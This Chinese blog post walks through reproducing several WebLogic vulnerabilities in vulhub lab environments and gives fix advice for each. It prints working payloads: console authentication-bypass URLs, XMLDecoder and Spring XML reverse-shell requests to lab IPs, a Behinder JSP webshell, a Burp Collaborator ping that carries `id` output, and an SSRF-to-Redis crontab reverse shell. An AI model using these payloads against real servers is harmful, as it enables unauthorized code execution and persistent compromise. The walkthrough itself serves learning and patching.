资讯专栏INFORMATION COLUMN

weblogic漏洞总结复现

glumes / 957人阅读

摘要:在当前页面抓包后修改内容,写入冰蝎脚本文件。添加的内容为实现反弹。影响范围相关漏洞有复现过程环境这里先使用扫描一下是否开启了服务。使用工具写入。

简介

WebLogic是美国Oracle公司出品的一个application server确切的说是一个基于JAVAEE架构的中间件,BEA WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。WebLogic Server具有标准和可扩展性的优点,对业内多种标准都可全面支持,包括EJB、JSP、Servlet、JMS、JDBC、XML(标准通用标记语言的子集)和WML,使Web应用系统的实施更为简单,并且保护了投资,同时也使基于标准的解决方案的开发更加简便,同时WebLogic Server以其高扩展的架构体系闻名于业内,包括客户机连接的共享、资源pooling以及动态网页和EJB组件群集。
默认端口为:7001

Weblogic未授权任意文件上传(CVE-2018-2894)

漏洞描述

Weblogic Web Service Test Page中有两个未授权页面,可以上传任意文件。但是有一定的限制,该页面在开发模式下存在,在生产模式下默认不开启,如果是生产模式,需要登陆后台进行勾选启动web服务测试页。

漏洞原理

页面测试页面有两个,都可以未授权任意上传文件。

/ws_utc/config.do/ws_utc/begin.do

利用前提是:该测试页面处于开发模式下。

影响范围

10.3.6
12.1.3
12.2.1.2
12.2.1.3

复现过程

环境:利用vulhub的环境,进入相应的目录后,docker-compose up -d
访问http://your-ip:7001/console/login/LoginForm.jsp
http://192.168.255.128:7001/console/login/LoginForm.jsp

因为使用的docker的开发环境,需要查看后台登录密码。(weblogic默认后台密码为:weblogic/weblogic)
docker-compose logs | grep password
用户名和密码:weblogic/wjONT3nU

我在物理机上登录时,用户和密码都正确但是出现拒绝访问;虚拟机可以正常登录,这是因为没有开启远程IP登录的原因。
在base-domain—>console->server->AdminServer—>Listen Address处设置需要远程登录的IP即物理机的IP或者直接设置0.0.0.0全部ip都可远程访问。


如果是生产模式下复现漏洞,登录后台后勾选启动web服务测试页。

  1. 测试/ws_utc/config.do页面
    访问http://192.168.255.128:7001/ws_utc/config.do
    设置Work Home Dir为ws_utc应用的静态文件css目录,因为默认上传目录不在Web目录无法执行webshell,这里设置为:/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css(css访问不需要任何权限)

    名字和密码随便设置,上传一个webshell脚本文件,点击提交,burpsuite抓包。

    返回一个时间戳1633502727693,上传的文件路径为:http://192.168.255.128:7001/ws_utc/css/config/keystore/[时间戳]_[⽂件名],即可执⾏ webshell,我这上传的是冰蝎的jsp文件,所以我用冰蝎连接获取webshell。

  2. 测试/ws_utc/begin.do页面
    条件:

    1./ws_utc/begin.do使用的工作目录是在/ws_utc/config.do中设置的Work Home Dir;
    2.利用需要知道部署应用的web目录;
    3.在生产模式下不开启,后台开启后,需要认证。

    访问http://192.168.255.128:7001/ws_utc/begin.do,上传jsp脚本。

    错误可忽略。

    查看响应包,找出上传的文件路径。/css/upload/RS_Upload_2021-10-06_07-16-37_823/import_file_name_1.jsp

    访问路径

http://192.168.255.128:7001/ws_utc/css/upload/RS_Upload_2021-10-06_07-16-37_823/import_file_name_1.jsp

成功获取webshell。

修复建议

1.启动生产模式后,Config.do页面登录授权后才可访问。
2.升级到最新版本,目前生产模式下已取消这两处上传文件的地方。

参考

WebLogic 任意文件上传漏洞(CVE-2018-2894)
WebLogic两处任意文件上传漏洞动态分析(CVE-2018-2894)

Weblogic Console HTTP协议远程代码执行漏洞(CVE-2020-14882/CVE-2020-12883)

漏洞描述

未经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的WebLogic Server 上执行任意代码。它们均存在于WebLogic的Console控制台组件中。此组件为WebLogic全版本默认自带组件,且该漏洞通过HTTP协议进行利用。将CVE-2020-14882和CVE-2020-14883进行组合利用后,远程且未经授权的攻击者可以直接在服务端执行任意代码,获取系统权限。

漏洞原理

通过访问console.portal 路径并且触发 handle 执行。
详细请移步:CVE-2020-14882:Weblogic Console 权限绕过深入解析

影响范围

10.3.6.0
12.1.3.0
12.2.1.3
12.2.1.4
14.1.1.0

复现过程

环境:vulhub

CVE-2020-14883: 权限绕过漏洞的poc:

http://192.168.255.128:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=AppDeploymentsControlPage&handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_domain%2CType%3DDomain%22%29

解码后为:

http://192.168.255.128:7001/console/images/../console.portal?_nfpb=true&_pageLabel=AppDeploymentsControlPage&handle=com.bea.console.handles.JMXHandle("com.bea:Name=base_domain,Type=Domain")

经测试…/需要二次url encode。

访问即可进入后台,达到未授权访问的效果但是这里没有部署安装的按钮,也就是说不能像常规进入后台后写shell进去,这里就需要用到远程加载XML文件拿shell。
CVE-2020-14882: 代码执行漏洞的poc(写入文件):

http://192.168.255.128:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27touch /tmp/test%27);%22);

解码后:

http://192.168.255.128:7001/console/images/../console.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec("touch /tmp/test");");

访问路径,发现是404。

其实已经创建了文件,可进入容器查看。

这里执行反弹shell的xml文件poc.xml:

    <beans xmlns="http://www.springframework.org/schema/beans"       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"       xsi:schemaLocation="     [url]http://www.springframework.org/schema/beans[/url] [url]http://www.springframework.org/schema/beans/spring-beans.xsd[/url]">        <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">            <constructor-arg >            <list>                <value>/bin/bashvalue>                <value>-cvalue>                <value>& /dev/tcp/192.168.255.128/6669 0>&1]]>value>            list>            constructor-arg>        bean>    beans>

修复建议

1、及时下载官方补丁进行升级修复。下载地址如下:https://www.oracle.com/security-alerts/cpuoct2020.html
2、关闭后台/console/console.portal的访问权限。
3、修改后台默认地址。

XMLDecoder反序列化漏洞(CVE-2017-10271)

漏洞描述

Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传
入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。

漏洞原理

在CVE-2017-3506之前,不对payload进行验证,使用object tag可以RCE,CVE-2017-3506的补丁在 weblogic/wsee/workarea/WorkContextXmlInputAdapter.java 中添加了validate方法,在解析xml时,Element字段出现object tag就抛出运行时异常,不过这次防护力度不够,导致了CVE-2017-10271,利用方式类似,使用了void tag进行RCE,于是CVE-2017-10271的补丁将object、new、method关键字加入黑名单,针对void和array这两个元素是有选择性的抛异常,其中当解析到void元素后,还会进一步解析该元素中的属性名,若没有匹配上index关键字才
会抛出异常。而针对array元素而言,在解析到该元素属性名匹配class关键字的前提下,还会解析该属性值,若没有匹配上byte关键字,才会抛出运行时异常。总之,这次的补丁基本上限定了不能生成java实例。

影响范围

10.3.6.0
12.1.3.0.0
12.2.1.1.0

复现过程

环境:vulhub
访问http://192.168.255.128:7001/wls-wsat/CoordinatorPortType
若出现以下回显页面,只要是在wls-wsat包中的皆受到影响,可以查看web.xml查看所有受影响的url,说明存在该漏洞。

user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/WEB-INF
受影响的url。

/wls-wsat/CoordinatorPortType/wls-wsat/RegistrationPortTypeRPC/wls-wsat/ParticipantPortType/wls-wsat/RegistrationRequesterPortType/wls-wsat/CoordinatorPortType11/wls-wsat/RegistrationPortTypeRPC11/wls-wsat/ParticipantPortType11/wls-wsat/RegistrationRequesterPortType11

burp在当前页面抓包后修改内容,写入冰蝎jsp脚本文件。
添加的内容为:

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java><java version="1.4.0" class="java.beans.XMLDecoder"> <object class="java.io.PrintWriter">  <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/shell.jspstring> <void method="println"><string> <%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%> ]]> string> void> <void method="close"/> object>java>java> work:WorkContext> soapenv:Header> <soapenv:Body/>soapenv:Envelope>



实现Linux反弹shell。
内容:

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.4.0" class="java.beans.XMLDecoder"><void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="3"><void index="0"><string>/bin/bashstring>void><void index="1"><string>-cstring>void><void index="2"><string>bash -i >& /dev/tcp/192.168.255.128/5555 0>&1string>void>array><void method="start"/>void>java>work:WorkContext>soapenv:Header><soapenv:Body/>soapenv:Envelope>


修复建议

1、前往Oracle官网下载10月份所提供的安全补丁:http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html
2、删除wls-wsat组件,再次访问返回404.

1.删除Oracle/Middleware/wlserver_10.3/server/lib/wls-wsat.war
2.删除user_projects/domains/base_domain/servers/AdminServer/tmp.internal/wls-wsat.war
3.删除C:/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp_WL_internal/wls-wsat
4.重启Weblogic

Weblogic反序列化远程代码执行漏洞(CVE-2019-2725)

漏洞描述

此漏洞实际上是CVE-2017-10271的又一入口,CVE-2017-3506的补丁过滤了object;CVE-2017-10271的补丁过滤了new,method标签,且void后面只能跟index,array后面只能跟byte类型的class;CVE-2019-2725的补丁过滤了class,限制了array标签中的byte长度。

影响组件

bea_wls9_async_response.war
wsat.war

影响范围

10.3.*
12.1.3

复现过程

环境:vulhub-weak_password
(因为weak_password环境的weblogic版本是10.3.6,在受影响的范围内。)
访问http://192.168.255.128:7001/_async/AsyncResponseService回显如下,则存在漏洞。

受影响的url不仅仅是/_async/AsyncResponseService还有如下url受影响。

/_async/AsyncResponseService/_async/AsyncResponseServiceJms/_async/AsyncResponseServiceHttps/_async/AsyncResponseServiceSoap12/_async/AsyncResponseServiceSoap12Jms/_async/AsyncResponseServiceSoap12Https

在此页面用burp抓包,修改包内容。

POC:

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing"xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>xxwsa:Action><wsa:RelatesTo>xxwsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="3"><void index="0"><string>/bin/bashstring>void><void index="1"><string>-cstring>void><void index="2"><string>ping `id`.bkzu3y7lywkcl9svfe5mroou4laby0.burpcollaborator.netstring>void>array><void method="start"/>void>work:WorkContext>soapenv:Header><soapenv:Body><asy:onAsyncDelivery/>soapenv:Body>soapenv:Envelope>

修复建议

1、升级本地JDK环境
2、及时安装官方补丁

WebLogic T3协议反序列化命令执行漏洞(CVE-2018-2628)

漏洞描述

远程攻击者可利用该漏洞在未授权的情况下发送攻击数据,通过T3协议(EJB支持远程访问,且支持多种协议。这是Web Container和EJB Container的主要区别)在Weblogic Server中执行反序列化操作,利用RMI(远程方法调用) 机制的缺陷,通过 JRMP 协议(Java Remote Messaging Protocol:java远程消息交换协议)达到执行任意反序列化 payload 的目的。

漏洞原理

在InboundMsgAbbrev中resolveProxyClass中,resolveProxyClass是处理rmi接口类型的,只判断了java.rmi.registry.Registry,这就会导致任意一个rmi接口都可绕过。核心部分就是JRMP(Java Remote Method protocol),在这个PoC中会序列化一个RemoteObjectInvocationHandler,它会利用UnicastRef建立到远端的tcp连接获取RMIregistry,加载回来再利用readObject解析,从而造成反序列化远程代码执行。

影响范围

10.3.6.0
12.1.3.0
12.2.1.1
12.2.1.2

相关漏洞有:

CVE-2015-4852CVE-2016-0638CVE-2016-3510CVE-2017-3248CVE-2018-2893CVE-2016-0638

复现过程

环境:vulhub
这里先使用nmap扫描一下是否开启了WebLogic T3服务。
nmap -n -v -p 7001,7002 192.168.1.10 --script=weblogic-t3-info

使用k8工具写入shell。


shell的绝对路径为:
/root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/wlscmd.jsp

使用脚本获取交互shell。
python cve-2018-2628.py

修复建议

1.过滤t3协议。
在域结构中点击 安全->筛选器
连接筛选器填: weblogic.security.net.ConnectionFilterImpl 保存后重启Weblogic.

Weblogic弱口令&&后台getshell

漏洞描述

由于管理员的安全意识不强,或者配置时存在疏忽,会导致后台存在弱口令或者默认的用户名/口令。

漏洞原理

通过弱口令登录后台后,部署恶意的war包可直接getshell。

影响范围

全版本

复现过程

环境:vulhub
弱口令为:weblogic/Oracle@123
通过弱口令登录后台点击部署—>安装



选择本机上的恶意war包。
简单制作war包jar -cvf xx.war xx.jsp


将此部署安装为应用程序。

输入命名即为访问恶意脚本文件路径的上层路径,点击完成。


访问http://192.168.255.128:7001/2/1.jsp?pwd=123&i=id,获取shell。

修复建议

1、修改默认密码和弱口令,加强密码的复杂度。

Weblogic SSRF漏洞(CVE-2014-4210)

漏洞描述

Oracle WebLogic Web Server既可以被外部主机访问,同时也允许访问内部主机。比如有一个jsp页面SearchPublicReqistries.jsp,我们可以利用它进行攻击,未经授权通过weblogic server连接任意主机的任意TCP 端口,可以能冗长的响应来推断在此端口上是否有服务在监听此端口,进而攻击内网中redis、fastcgi等脆弱组件。

影响范围

10.0.2.0
10.3.6.0

复现过程

环境:vulhub

验证漏洞
访问该路径,如果能正常访问,说明存在该漏洞。
/uddiexplorer/SearchPublicRegistries.jsp

点击search,burp抓取数据包。

修改请求方式为GET,将operator的值修改为http%3a%2f%2f192.168.255.128:7001,发现返回如下信息,说明开放7001端口,但是不是http协议。

<p>An error has occurred<BR>weblogic.uddi.client.structures.exception.XML_SoapException: The server at http://192.168.255.128:7001 returned a 404 error code (Not Found).  Please ensure that your URL is correct, and the web service has deployed without error.


修改为http%3a%2f%2f192.168.255.128:7002,返回信息如下,说明端口7002未开放。

<p>An error has occurred<BR>weblogic.uddi.client.structures.exception.XML_SoapException: Tried all: '1' addresses, but could not connect over HTTP to server: '192.168.255.128', port: '7002'

修改为http%3a%2f%2f192.168.255.128:80,发现返回如下信息,说明开放80端口,是http协议。

<p>An error has occurred<BR>weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://192.168.255.128:80 which did not have a valid SOAP content-type: text/html.

我们可以通过ssrf来探测内网存在主机以及端口开放的信息。
环境中存在开放了redis的主机,查看主机的IP。
docker inspect 容器ID

我们利用ssrf来探测验证该主机是否存在redis服务器。

确实有redis服务器,利用redis服务器burp改包直接反弹shell脚本到本机kail上(192.168.255.131)。

operator=http://192.168.112.2:6379/testset 1 "/n/n/n/n* * * * * root bash -i >& /dev/tcp/192.168.255.131/8888 0>&1/n/n/n/n"config set dir /etc/config set dbfilename crontabsaveaaa

URL编码后:
operator=http://192.168.112.2:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.255.131%2F8888%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa

kali上监听8888端口,成功反弹shell。

修复建议

1、删除SearchPublicRegistries.jsp文件或修改SearchPublicRegistries.jsp文件后缀为不解析后缀,如SearchPublicRegistries.jspxxx,后重启Weblogic。
2、升级至不受影响的版本。

总结

WebLogic存在的漏洞有很多,这里总结主要是对一些常见的漏洞复现和分析(主要是vulhub上的环境)当然了目前网上都有很多自动化的检测和利用工具,这里手动验证是为了加深印象;漏洞的原理很多都是参考大佬们的文章,个人其实还是有很多不是很理解(菜狗)这里对大佬们表示衷心的感谢。后续继续补充其他漏洞复现。

文章版权归作者所有,未经允许请勿转载,若此文章存在违规行为,您可以联系管理员删除。

转载请注明本文地址:https://www.ucloud.cn/yun/121931.html

相关文章

  • Weblogic 管理控制台未授权远程命令执行漏洞(CVE-2020-14882,CVE-2020-

    一、软件介绍 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的...

    zhongmeizhi 评论0 收藏0
  • 网络安全漏洞复现与分析

    ... 漏洞介绍 Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构...

    Developer 评论0 收藏0
  • 渗透测试——常见服务端口及对应的漏洞汇总

    ... 后台弱口令 任意文件泄露 AVA反序列化 weblogic--7001/7002 后台弱口令 console后台部署war包 SSRF 测试页面上传webshell JAVA反序列化 CVE-2018-2628 CVE-2018-2893 CVE-2017-10271 ...

    2bdenny 评论0 收藏0
  • 尘技-教你如何造安全相关文章

    ...造出文章,可以参考思路如下。 总结类 = 按照分类收集漏洞+复现+分析 创新类 = 新想法or新思路or新XXX 实录类 = 外网漏洞+内网漏洞->导向结果 见解类 = 提出论题+解读论题+互动 工具分享类 = Github中ReadMe ? 造文实战 总结总结就...

    EsgynChina 评论0 收藏0
  • Tomcat 漏洞总结

    ...弱口令&后台war部署 Manager App 登录口处可爆破 CVE-2017-12615 漏洞原理 CVE-2017-12615由于配置不当,可导致任意文件上传,影响版本:Tomcat7.0.0-7.0.81 由于配置不当,conf/web.xml中的readonly设置为flase,可导致用PUT方法上传任意文件,但限...

    Ethan815 评论0 收藏0

发表评论

0条评论

最新活动
阅读需要支付1元查看
<